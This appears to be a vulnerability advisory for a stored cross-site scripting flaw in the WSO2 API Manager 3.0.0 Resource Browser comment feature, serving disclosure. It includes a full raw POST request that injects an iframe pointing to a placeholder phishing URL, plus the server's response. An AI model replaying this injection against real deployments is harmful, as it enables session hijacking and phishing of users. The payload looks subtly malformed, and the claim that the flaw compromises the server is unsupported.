Document Title: =============== WSO2 API Manager Stored XSS Vulnerability Common Vulnerability Scoring System: ==================================== 5.4 CVE : =================== N/A Security Advisory : =================== https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0700 Latest Release after Fixing Vuln: =================================== V 3.1.0 (https://wso2.com/library/articles/introducing-wso2-api-manager-3-1/ ) Author : ================== Raki Ben Hamouda Affected Product(s): ==================== WSO2 API Manager Carbon interface V3.0.0 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A remote Stored Cross Site Scripting has been discovered in WSO2 API Manager Ressource Browser component). The security vulnerability allows a remote attacker With access to the component "Ressource Browser" to inject a malicious code in Add Comment Feature. The vulnerability is triggered after sending a POST request to `/carbon/info/comment-ajaxprocessor.jsp` with Parameter "comment=targeted&path=%2F". Remote attackers has the ablility to spread a malware,to Hijack a session (a session with Higher privileges), or to initiate phishing attacks. The security risk of the Stored XSS web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.4 Exploitation of the Stored XSS web vulnerability requires a low privilege web-application user account and medium or high user interaction. Successful exploitation of the vulnerability results in Compromising the server . Request Method: [+] POST Module: [+] /carbon/info/comment-ajaxprocessor.jsp Parameters: [+] comment=admincomment [+] path=%2F ======================================= POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1 Host: 192.168.149.1:9443 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.149.1:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/ X-Requested-With: XMLHttpRequest, XMLHttpRequest X-Prototype-Version: 1.5.0 Content-type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRF-Token: L4OB-I2K8-W66N-K44H-JNSM-6L0Z-BB17-BGWH Content-Length: 64 Cookie: region3_registry_menu=visible; region3_metadata_menu=none; wso2.carbon.rememberme=admin-0db64b12-e661-4bc8-929d-6ab2cc7b192e; JSESSIONID=4B3AB3AA8895F2897685FA98C327D521; requestedURI=../../carbon/admin/index.jsp; region1_configure_menu=none; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=registry_menu%252Cresource_browser_menu%2523 Connection: close comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F ============================== HTTP/1.1 200 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: DENY vary: accept-encoding Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Tue, 31 Dec 2019 10:50:00 GMT Connection: close Server: WSO2 Carbon Server Content-Length: 3144 //the body of response includes attacker malicious script